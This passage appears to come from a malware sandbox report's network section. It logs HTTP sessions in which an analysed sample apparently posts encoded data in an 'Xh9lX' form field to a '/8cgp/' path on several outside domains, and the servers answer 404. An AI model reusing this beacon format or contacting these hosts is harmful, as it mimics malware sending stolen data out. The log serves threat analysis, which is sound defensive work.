                                                                    Data Raw: 58 68 39 6c 58 3d 46 66 2b 49 6f 43 4a 49 6f 42 67 4c 71 48 4f 51 4b 50 68 65 42 6b 4e 69 4b 72 55 70 72 6c 4e 4e 4d 32 72 2b 76 52 77 67 57 35 31 52 67 61 45 50 4f 67 51 4d 76 77 32 71 55 53 6c 6a 45 43 4c 77 76 66 6a 75 41 7a 46 33 51 6b 42 4f 76 32 4e 63 53 34 50 33 4b 6c 2b 76 37 69 6d 2b 5a 63 53 7a 47 6b 4b 59 32 70 59 61 39 7a 67 71 51 30 52 7a 2b 6a 34 52 67 2f 67 38 73 31 68 71 4e 59 76 6c 66 64 75 7a 6f 4f 61 63 6c 31 2b 2b 30 78 44 2b 71 35 59 51 54 55 79 4a 39 55 31 4c 6c 47 5a 35 45 68 64 57 51 4c 68 66 4b 41 31 4c 2b 73 63 79 33 63 6d 44 75 69 52 71 68 70 6a 48 69 7a 49 35 4b 4c 6b 47 53 59 4b 63 68 68 54 44 4d 58 68 72 62 75 48 34 50 66 68 72 44 4b 52 66 72 58 38 73 55 66 67 43 66 55 4c 69 68 51 59 7a 58 6d 68 75 79 44 6f 43 56 53 6c 76 4f 78 49 58 6a 69 4c 71 56 59 62 72 42 35 75 55 54 75 48 2b 31 70 69 32 37 59 57 6a 4f 47 64 31 6b 53 46 34 6e 37 73 4d 49 54 33 61 6c 66 69 48 77 61 33 4b 47 6b 7a 6f 6b 68 57 6b 55 34 78 32 68 78 61 54 61 4d 59 71 69 6e 39 30 73 4e 65 39 59 30 37 61 43 57 48 4c 54 56 46 54 77 63 72 55 70 43 6e 35 36 48 58 6e 36 51 4b 32 79 67 47 51 6a 54 48 75 33 43 69 4f 31 54 6e 71 79 51 4f 59 68 4e 5a 2b 4c 67 5a 6b 55 34 4a 2f 38 56 63 32 37 45 6c 78 41 35 4e 74 34 70 41 69 53 42 47 66 64 71 4a 73 38 66 66 51 6a 6c 34 63 58 67 2b 65 33 53 4c 50 59 57 39 52 57 57 73 63 4e 74 2b 75 32 44 54 47 69 58 33 73 78 4e 72 66 58 42 2f 41 45 63 57 37 68 54 49 66 37 46 61 30 50 51 64 53 39 63 6d 6d 78 52 63 72 57 35 73 45 36 75 67 6b 35 37 71 37 49 55 61 63 49 58 5a 54 75 4c 30 6d 68 2f 6b 50 76 43 51 45 37 4e 53 44 69 73 64 61 46 4a 45 61 49 6d 2f 42 71 54 30 30 51 32 77 3d
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLqHOQKPheBkNiKrUprlNNM2r+vRwgW51RgaEPOgQMvw2qUSljECLwvfjuAzF3QkBOv2NcS4P3Kl+v7im+ZcSzGkKY2pYa9zgqQ0Rz+j4Rg/g8s1hqNYvlfduzoOacl1++0xD+q5YQTUyJ9U1LlGZ5EhdWQLhfKA1L+scy3cmDuiRqhpjHizI5KLkGSYKchhTDMXhrbuH4PfhrDKRfrX8sUfgCfULihQYzXmhuyDoCVSlvOxIXjiLqVYbrB5uUTuH+1pi27YWjOGd1kSF4n7sMIT3alfiHwa3KGkzokhWkU4x2hxaTaMYqin90sNe9Y07aCWHLTVFTwcrUpCn56HXn6QK2ygGQjTHu3CiO1TnqyQOYhNZ+LgZkU4J/8Vc27ElxA5Nt4pAiSBGfdqJs8ffQjl4cXg+e3SLPYW9RWWscNt+u2DTGiX3sxNrfXB/AEcW7hTIf7Fa0PQdS9cmmxRcrW5sE6ugk57q7IUacIXZTuL0mh/kPvCQE7NSDisdaFJEaIm/BqT00Q2w=
                                                                    Apr 24, 2024 12:32:42.484846115 CEST377INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:42 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    60192.168.11.2050305118.27.122.21480
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:45.027126074 CEST1289OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 46 66 2b 49 6f 43 4a 49 6f 42 67 4c 71 48 4f 51 4b 50 68 65 42 6b 4e 69 4b 72 55 70 72 6c 4e 4e 4d 32 72 2b 76 52 77 67 57 35 39 52 67 6f 38 50 4f 44 34 4d 73 77 32 71 49 69 6c 69 45 43 4c 74 76 65 48 71 41 7a 5a 4a 51 6d 4a 4f 76 6e 64 63 54 4f 6a 33 59 31 2b 71 2b 69 6d 67 53 38 53 6e 47 6b 57 4d 32 70 4d 6b 36 41 38 71 52 30 68 7a 31 30 6b 53 38 2f 67 2b 73 31 68 75 4a 59 75 59 66 63 62 74 6f 4f 6d 63 6c 32 61 2b 33 6a 37 2b 36 36 77 51 4c 55 79 47 30 30 31 4f 73 6d 5a 79 45 68 68 34 51 4c 68 6c 4b 45 4e 4c 2b 73 38 79 32 65 4f 41 75 43 52 71 69 70 6a 47 6d 79 30 31 4b 50 45 6b 53 5a 75 63 68 6a 54 44 65 6e 68 72 66 2f 48 2f 4a 2f 67 67 48 4b 52 49 76 58 34 65 55 66 6b 34 66 56 2f 69 68 67 4d 7a 58 56 4a 75 31 6e 38 43 59 53 6c 74 52 68 4a 4e 30 79 4c 49 56 59 4b 43 42 35 50 68 54 74 72 2b 32 4e 36 32 75 4a 57 73 4a 6d 64 2f 34 43 46 58 6a 37 67 51 49 56 57 4c 6c 66 69 70 77 66 54 4b 46 58 72 6f 6c 6b 36 37 54 6f 78 31 70 52 62 52 44 63 6b 77 69 6e 68 38 73 4d 32 74 59 33 58 61 44 32 48 4c 57 79 5a 51 36 73 71 63 30 53 6e 72 2b 48 58 38 36 51 47 4d 79 69 71 41 6a 41 44 75 35 53 79 4f 6b 54 6e 74 34 51 4f 63 6f 74 59 31 63 77 5a 6b 55 34 45 45 38 56 41 32 37 78 42 78 42 4c 6c 74 2b 36 59 69 4a 42 47 64 64 71 49 69 38 66 69 6d 6a 6b 42 39 58 68 50 35 33 52 6e 50 66 45 46 52 54 58 73 66 4c 64 2b 52 79 44 54 52 73 33 71 71 78 4e 33 48 58 42 76 36 45 72 65 37 6d 54 59 66 74 31 61 33 4a 77 64 5a 36 63 6e 2f 6d 41 68 30 57 35 42 38 36 76 46 35 35 35 71 37 5a 46 7a 69 61 30 5a 4d 38 35 6f 32 36 73 41 75 6f 79 4d 4a 36 65 6d 66 72 4e 39 33 45 4a 4e 49 4c 33 50 57 2f 52 64 33 45 77 62 4a 46 74 35 77 36 4c 35 49 68 7a 79 72 50 45 6f 70 35 49 65 7a 4a 79 31 34 58 4a 76 43 58 66 41 49 52 71 74 6e 76 52 70 44 36 6e 32 42 6f 61 51 49 46 65 61 79 71 51 38 4d 79 50 61 62 43 75 4c 39 58 4f 45 77 5a 4c 68 6e 4f 56 53 54 2f 52 33 78 77 6d 79 5a 4d 63 35 49 47 70 66 36 4b 45 61 72 6b 75 32 31 58 36 4d 6b 6c 75 42 68 32 51 31 44 34 41 64 58 65 42 7a 4d 35 4f 53 41 54 36 30 70 49 72 66 31 31 6a 6c 44 6b 45 6f 70 34 65 45 5a 41 78 64 41 38 6f 55 39 2b 59 36 42 34 49 6c 4a 2b 43 78 33 6b 4b 56 61 55 77 51 50 63 4f 45 52 64 71 73 63 70 4e 62 39 59 43 6c 38 69 54 45 4c 37 33 5a 42 2b 77 61 2f 33 30 69 62 6c 68 34 6b 6f 77 67 77 6f 59 57 32 4b 2b 6b 53 48 4d 70 53 49 52 35 42 69 54 56 75 4e 55 2f 6a 66 51 44 73 77 2b 43 5a 59 78 48 2f 32 53 75 59 6d 68 6c 6a 34 30 62 64 75 61 62 4e 66 4d 32 52 71 53 54 69 55 43 72 59 57 62 35
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLqHOQKPheBkNiKrUprlNNM2r+vRwgW59Rgo8POD4Msw2qIiliECLtveHqAzZJQmJOvndcTOj3Y1+q+imgS8SnGkWM2pMk6A8qR0hz10kS8/g+s1huJYuYfcbtoOmcl2a+3j7+66wQLUyG001OsmZyEhh4QLhlKENL+s8y2eOAuCRqipjGmy01KPEkSZuchjTDenhrf/H/J/ggHKRIvX4eUfk4fV/ihgMzXVJu1n8CYSltRhJN0yLIVYKCB5PhTtr+2N62uJWsJmd/4CFXj7gQIVWLlfipwfTKFXrolk67Tox1pRbRDckwinh8sM2tY3XaD2HLWyZQ6sqc0Snr+HX86QGMyiqAjADu5SyOkTnt4QOcotY1cwZkU4EE8VA27xBxBLlt+6YiJBGddqIi8fimjkB9XhP53RnPfEFRTXsfLd+RyDTRs3qqxN3HXBv6Ere7mTYft1a3JwdZ6cn/mAh0W5B86vF555q7ZFzia0ZM85o26sAuoyMJ6emfrN93EJNIL3PW/Rd3EwbJFt5w6L5IhzyrPEop5IezJy14XJvCXfAIRqtnvRpD6n2BoaQIFeayqQ8MyPabCuL9XOEwZLhnOVST/R3xwmyZMc5IGpf6KEarku21X6MkluBh2Q1D4AdXeBzM5OSAT60pIrf11jlDkEop4eEZAxdA8oU9+Y6B4IlJ+Cx3kKVaUwQPcOERdqscpNb9YCl8iTEL73ZB+wa/30iblh4kowgwoYW2K+kSHMpSIR5BiTVuNU/jfQDsw+CZYxH/2SuYmhlj40bduabNfM2RqSTiUCrYWb5
                                                                    Apr 24, 2024 12:32:45.027204990 CEST5156OUTData Raw: 57 36 2b 45 70 7a 43 6e 32 42 68 72 57 53 76 41 44 4d 33 55 65 42 58 37 62 59 76 43 6b 42 57 72 46 58 2f 65 37 44 6b 4b 61 66 46 6e 37 73 2b 6a 51 73 30 70 63 51 38 64 30 62 53 31 66 47 52 56 59 32 52 78 30 79 4f 55 56 61 2f 39 79 42 79 47 42 53
                                                                    Data Ascii: W6+EpzCn2BhrWSvADM3UeBX7bYvCkBWrFX/e7DkKafFn7s+jQs0pcQ8d0bS1fGRVY2Rx0yOUVa/9yByGBSXEBwYrpzS1LAhZlehA5tm0yMZX+/lmcFe7DTVdDv7XRAgb3g50bhgRoy2bIFFkb+eBjUWKUySj55YaDJl4IoMmTr3aotnWbxOo0SGfv0zF3mIUEIDK9iWsLdAkFD8dd0xkjaJ327dU4ObCvApBGqi3Qcsy52661q1
                                                                    Apr 24, 2024 12:32:45.027257919 CEST6445OUTData Raw: 68 4d 48 4d 36 42 57 35 2f 6d 71 58 6e 62 6a 31 61 77 6f 56 6f 55 50 56 6a 62 66 67 72 49 48 78 4a 34 57 37 77 73 74 67 4d 6e 6b 42 71 59 75 2f 43 70 41 68 47 58 76 34 2f 30 55 4a 6f 46 71 71 43 5a 44 71 4a 59 46 6a 4b 51 2f 4c 7a 2f 77 75 41 64
                                                                    Data Ascii: hMHM6BW5/mqXnbj1awoVoUPVjbfgrIHxJ4W7wstgMnkBqYu/CpAhGXv4/0UJoFqqCZDqJYFjKQ/Lz/wuAdZ4Fakz4jLUHQ0E9gM9YTbDfjrnuHK2ayRI8bm/yKmmBcYY8mjH0PfKw5k1s+IwezToqvWJyPbl75ZY2HSTcfNq6scIpOd6SVcNx8RA0Ira0Lv+tWuGpBiTm/mIGs2Zebpzd/7A+FlM0wgitD5Z8HA4nabyAgmWYAz
                                                                    Apr 24, 2024 12:32:45.306303978 CEST2578OUTData Raw: 66 35 7a 32 72 64 67 76 66 4b 6f 54 34 4d 38 44 6c 71 51 7a 63 4a 52 53 7a 43 7a 6d 58 4d 66 36 35 59 2b 4b 64 32 36 38 4e 6a 39 68 58 73 2b 4f 45 38 4a 65 71 61 57 62 53 71 68 4e 34 62 38 4e 46 4d 4b 6b 53 54 55 63 53 74 76 63 4d 45 4d 5a 30 5a
                                                                    Data Ascii: f5z2rdgvfKoT4M8DlqQzcJRSzCzmXMf65Y+Kd268Nj9hXs+OE8JeqaWbSqhN4b8NFMKkSTUcStvcMEMZ0ZAOd+ydQYcuJq8r4mq8PpO3UfBeU+3toRtN4qa7DLyzjVRalCRgvt8zOIDuBIorGsEAc9F6Z3bguTt42dta9oWMxZh7RrRL2rO9DhWO5It6aUXRA3iwonJws1yNQAXCf6UrColvm+40ii1rdFBs9yFhOs9RNPYRPEW
                                                                    Apr 24, 2024 12:32:45.306449890 CEST2578OUTData Raw: 77 63 73 37 78 4d 7a 52 42 4e 31 6f 76 51 65 6c 37 65 49 48 57 67 41 4a 50 69 77 4d 4b 53 41 71 65 54 47 4a 71 78 67 34 73 37 72 73 6d 6d 4e 75 2b 72 71 44 74 6a 34 59 5a 58 34 64 6d 49 6e 62 38 33 42 4f 71 52 35 71 39 43 2f 36 57 49 70 4f 42 4f
                                                                    Data Ascii: wcs7xMzRBN1ovQel7eIHWgAJPiwMKSAqeTGJqxg4s7rsmmNu+rqDtj4YZX4dmInb83BOqR5q9C/6WIpOBO7/JEPRPPSKxFB/eBkVi2/oYUzccFWKYUGvtQXM8U4NiiviIjiof4xzLwAryjWVmcdNy8VZXXIbIoQ7lhEb3FGUg9FRNLm324iyioV4Qy4a88sohaEAnjsv40BFacbVhWjkIAKawrmdKEjgr/8Py0hsWY8kPgNxoMf
                                                                    Apr 24, 2024 12:32:45.306644917 CEST3867OUTData Raw: 69 41 6b 48 42 67 4c 74 63 49 38 58 79 39 75 74 6f 68 48 43 57 54 77 33 35 6c 6b 59 64 5a 4a 47 46 2b 53 76 59 51 51 37 5a 4a 75 5a 76 4c 4e 63 4e 6d 6c 47 75 68 4c 36 7a 39 4d 4d 51 65 58 39 44 6c 30 77 48 4a 6c 48 31 57 31 61 69 47 55 51 6a 61
                                                                    Data Ascii: iAkHBgLtcI8Xy9utohHCWTw35lkYdZJGF+SvYQQ7ZJuZvLNcNmlGuhL6z9MMQeX9Dl0wHJlH1W1aiGUQjavuN0RauTlljzVLlrbEIHhM85fM2jAb/Fl/BYUQ6zlwck9x69inseGBNOsBzlWQIBJHWERBvPIitP0ZXnqQMZMp+3SRE2TtS9VvxfamKu3dhoh5QgENZgJKd+i8iXdRf06nzwkQNmQPZ3RAmLwTrpvkADU1qlF0Rbg
                                                                    Apr 24, 2024 12:32:45.306813002 CEST16757OUTData Raw: 66 30 43 6d 44 66 4a 50 64 38 31 56 6a 37 68 75 77 59 45 75 6d 71 47 42 4a 4a 66 6b 2f 73 50 32 32 6f 4a 6b 73 32 45 76 61 6e 6b 76 59 56 36 33 65 47 39 4a 63 47 69 61 6b 38 33 4b 54 66 4b 70 4b 59 6c 32 43 69 6b 58 72 56 2b 52 79 4c 57 70 42 7a
                                                                    Data Ascii: f0CmDfJPd81Vj7huwYEumqGBJJfk/sP22oJks2EvankvYV63eG9JcGiak83KTfKpKYl2CikXrV+RyLWpBz6rOZ20npxbRpXi3vnrYdkAcYcWcWKjrOZCeLogpbccpz0IuZeIbjO+hsiKVpzV8ZOrSNw3WdQK9ybzjXCGbV7H1JbvHjLOItlbfwEAawPqRc6cSMnd+kqQsznVfRVjcSNpy76f+V4ri6jbI+Y5lP9UNeZgWN7hz0e
                                                                    Apr 24, 2024 12:32:45.585517883 CEST2578OUTData Raw: 78 66 46 2b 41 55 4b 33 6b 76 53 45 44 4f 4f 45 2b 52 59 44 48 70 4c 6e 67 51 41 4c 4d 6c 56 74 61 57 4f 6b 4f 39 36 30 30 38 4d 48 72 30 53 65 2b 4c 63 79 75 69 73 71 71 76 50 71 69 32 76 72 6b 5a 4e 6b 53 73 53 61 6a 31 5a 71 2f 7a 4a 64 6f 56
                                                                    Data Ascii: xfF+AUK3kvSEDOOE+RYDHpLngQALMlVtaWOkO96008MHr0Se+LcyuisqqvPqi2vrkZNkSsSaj1Zq/zJdoVBQ8GJdR39vIDdyrugZl2q7xMRSKLWZQjjHeaf9EJd+Qzn2RFYy2UG7o3F1YuSLDKyTgph30IFzdWyXIYSAI/16nAvvBVKD20dLQyPkefbTsuM7mAmaKteHxqWfmlxPgu3/TYspeMCc074FpP/PitKhma/K6oRmhic
                                                                    Apr 24, 2024 12:32:45.585692883 CEST2578OUTData Raw: 5a 5a 4f 34 35 6e 68 55 48 6c 6e 39 64 72 39 71 62 41 64 4f 73 38 34 5a 74 61 68 75 52 63 61 6e 79 4d 42 39 32 61 62 6d 36 33 46 66 5a 31 64 6f 59 41 79 76 6f 4e 62 72 77 41 30 67 69 30 75 4f 57 35 46 30 7a 38 79 6d 30 39 58 30 78 75 61 4c 42 44
                                                                    Data Ascii: ZZO45nhUHln9dr9qbAdOs84ZtahuRcanyMB92abm63FfZ1doYAyvoNbrwA0gi0uOW5F0z8ym09X0xuaLBDVZR5WBykmQxYve1w5g1jZyRvZHSj2Hqr0msjEvmLUXILg6Noy2dRxnhI+FN5z3I9jx+0WacMUYoDaMAmsnLDHSHWRaK86ris9MWok3ClCWjjz8CcPd68kg4AamRXAwsPaaH8ajN0GwDfk8nzWFdFld9OaxAvqlEj1
                                                                    Apr 24, 2024 12:32:45.585894108 CEST5156OUTData Raw: 47 47 58 56 5a 5a 65 71 63 6d 6d 59 53 6c 37 33 6d 58 4b 43 46 34 35 34 70 61 39 36 38 52 35 6e 70 6a 53 4e 74 69 75 44 48 75 66 77 33 49 54 75 4f 61 79 49 2b 69 42 65 37 69 57 6b 77 6a 59 46 52 2b 31 6c 57 58 54 42 50 44 65 46 61 46 44 44 6e 57
                                                                    Data Ascii: GGXVZZeqcmmYSl73mXKCF454pa968R5npjSNtiuDHufw3ITuOayI+iBe7iWkwjYFR+1lWXTBPDeFaFDDnWTe1b8XFw1BWK1j5aDi3k3Pg6tX1nQZheCDMA3wgCyxYOm5VzeL/277s2POcj3remadN5JdLyF1sQpyA2wTroFVtXTgtP8fhhhAaluztAlS5V3pK4fqdvw7K0S9QZkA/b+Pk1lGLhvnvyeuKq+0BavUzTRdcZiGR1q
                                                                    Apr 24, 2024 12:32:45.586035967 CEST4423OUTData Raw: 7a 4d 72 6e 57 49 45 4c 62 61 63 5a 73 48 56 37 35 57 5a 4e 57 37 31 49 4b 59 4a 44 61 56 4f 61 79 55 45 53 68 4e 50 49 4a 6a 59 48 4f 79 36 6a 44 63 46 48 55 6e 69 41 4d 57 49 45 6d 6c 65 30 39 53 34 4e 36 4e 72 71 59 4c 72 35 33 75 79 6a 76 2b
                                                                    Data Ascii: zMrnWIELbacZsHV75WZNW71IKYJDaVOayUEShNPIJjYHOy6jDcFHUniAMWIEmle09S4N6NrqYLr53uyjv+fRHTmZcqlw05iEp1GQiL6nxmzZGF7dJxOMD0W80TVasNj4012UYd7Jak2BtU7XnED3jYGmgZ5kH5SYCfU3hWykLmMZKFeuKIt6IYOon4rTOgtBNks0nq9PBkhSEd03HN8a8hJWlS7LwS/w9E0gVrQ/VtdrYYv8qYJ
                                                                    Apr 24, 2024 12:32:45.866132975 CEST377INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:45 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    61192.168.11.2050306118.27.122.21480
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:47.832206964 CEST392OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kansaiwoody.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:48.096751928 CEST359INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:47 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 196
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    62192.168.11.2050307157.7.107.6380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:53.385674000 CEST680OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 31 45 47 6f 64 74 49 5a 47 34 6c 43 45 78 54 31 56 2b 34 34 35 4f 43 31 4b 64 42 38 30 61 43 31 57 59 58 33 63 4b 4c 59 35 63 45 71 4a 73 6c 50 32 49 57 6a 54 53 65 59 36 58 64 4b 63 4c 46 31 5a 6e 43 7a 74 62 33 62 2f 5a 63 31 52 44 41 69 43 53 37 38 76 78 37 54 42 6d 4c 76 64 72 5a 73 44 71 68 63 30 62 34 38 7a 38 58 30 39 4a 6e 4e 50 67 33 62 45 33 7a 65 6d 42 4e 6b 4c 36 2b 62 4c 2f 57 56 62 65 76 31 6c 49 50 78 36 53 53 76 7a 77 6c 66 4a 34 53 58 78 55 32 43 4a 4b 66 67 58 72 6c 41 75 36 45 44 61 75 63 47 55 6c 6b 6b 76 59 4b 73 58 38 78 70 6f 42 6a 2f 43 4a 79 37 6a 67 3d 3d
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCExT1V+445OC1KdB80aC1WYX3cKLY5cEqJslP2IWjTSeY6XdKcLF1ZnCztb3b/Zc1RDAiCS78vx7TBmLvdrZsDqhc0b48z8X09JnNPg3bE3zemBNkL6+bL/WVbev1lIPx6SSvzwlfJ4SXxU2CJKfgXrlAu6EDaucGUlkkvYKsX8xpoBj/CJy7jg==
                                                                    Apr 24, 2024 12:32:53.867836952 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:32:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 